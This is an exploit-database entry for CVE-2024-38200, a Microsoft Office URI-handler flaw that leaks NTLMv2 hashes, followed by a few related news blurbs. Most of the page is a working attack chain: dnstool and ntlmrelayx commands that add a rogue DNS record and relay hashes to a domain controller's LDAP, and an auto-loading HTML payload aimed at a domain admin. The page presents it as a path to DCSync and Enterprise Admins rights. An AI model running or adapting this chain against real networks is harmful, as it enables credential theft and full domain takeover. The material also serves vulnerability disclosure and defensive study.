Headline
Microsoft Office NTLMv2 Disclosure
Microsoft Office 2019 MSO build 1808 (16.0.10411.20011) and Microsoft 365 MSO version 2403 build 16.0.17425.20176 suffer from an NTLMv2 hash disclosure vulnerability.
Exploit Title: Microsoft Office NTLMv2 Disclosure Vulnerability
Exploit Author: Metin Yunus Kandemir
Vendor Homepage: https://www.office.com/
Software Link: https://www.office.com/
Details: https://github.com/passtheticket/CVE-2024-38200
Version: Microsoft Office 2019 MSO Build 1808 (16.0.10411.20011), Microsoft 365 MSO (Version 2403 Build 16.0.17425.20176)
Tested against: Windows 11
CVE: CVE-2024-38200
Description
MS Office URI schemes allow for fetching a document from remote source.
MS URI scheme format is ‘< scheme-name >:< command-name >"|"< command-argument-descriptor > "|"< command-argument >’ .
Example: ms-word:ofe|u|http://hostname:port/leak.docx
When the URI “ms-word:ofe|u|http://hostname:port/leak.docx” is invoked from a victim computer. This behaviour is abused to capture and relay NTLMv2 hash over SMB and HTTP. For detailed information about capturing a victim user’s NTLMv2 hash over SMB, you can also visit https://www.privsec.nz/releases/ms-office-uri-handlers.
Proof Of Concept
If we add a DNS A record and use this record within the Office URI, Windows will consider the hostname as part of the Intranet Zone. In this way, NTLMv2 authentication occurs automatically and a standard user can escalate privileges without needing a misconfigured GPO. Any domain user with standard privileges can add a non-existent DNS record so this attack works with default settings for a domain user.
Add a DNS record to resolve hostname to attacker IP address which runs ntlmrelayx. It takes approximately 5 minutes for the created record to start resolving.
$ python dnstool.py -u ‘unsafe.local\testuser’ -p ‘pass’ -r ‘attackerhost’ --action ‘add’ --data [attacker-host-IP] [DC-IP] --zone unsafe.localFire up ntlmrelayx with following command
$ python ntlmrelayx.py -t ldap://DC-IP-ADDRESS --escalate-user testuser --http-port 8080Serve following HTML file using Apache server. Replace hostname with added record (e.g. attackerhost).
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Microsoft Office</title>
</head>
<body>
<a id="link" href="ms-word:ofe|u|http://hostname:port/leak.docx"></a>
<script>
function navigateToLink() {
var link = document.getElementById('link');
if (link) {
var url = link.getAttribute('href');
window.location.href = url;
}
}
window.onload = navigateToLink;
</script>
</body>
</html>
Send the URL of the above HTML file to a user with domain admin privileges. You should check whether the DNS record is resolved with the ping command before sending the URL. When the victim user navigates to the URL, clicking the ‘Open’ button is enough to capture the NTLMv2 hash. (no warning!)
The captured NTLMv2 hash over HTTP is relayed to Domain Controller with ntlmrelayx. As a result, a standard user can obtain DCSync and Enterprise Admins permissions under the default configurations with just two clicks.
Related news
Voting Village co-founder Harri Hursti told Politico the list of vulnerabilities ran “multiple pages.”
Microsoft on Tuesday shipped fixes to address a total of 90 security flaws, including 10 zero-days, of which six have come under active exploitation in the wild. Of the 90 bugs, seven are rated Critical, 79 are rated Important, and one is rated Moderate in severity. This is also in addition to 36 vulnerabilities that the tech giant resolved in its Edge browser since last month. The Patch Tuesday
Microsoft has disclosed an unpatched zero-day in Office that, if successfully exploited, could result in unauthorized disclosure of sensitive information to malicious actors. The vulnerability, tracked as CVE-2024-38200 (CVSS score: 7.5), has been described as a spoofing flaw that affects the following versions of Office - Microsoft Office 2016 for 32-bit edition and 64-bit editions Microsoft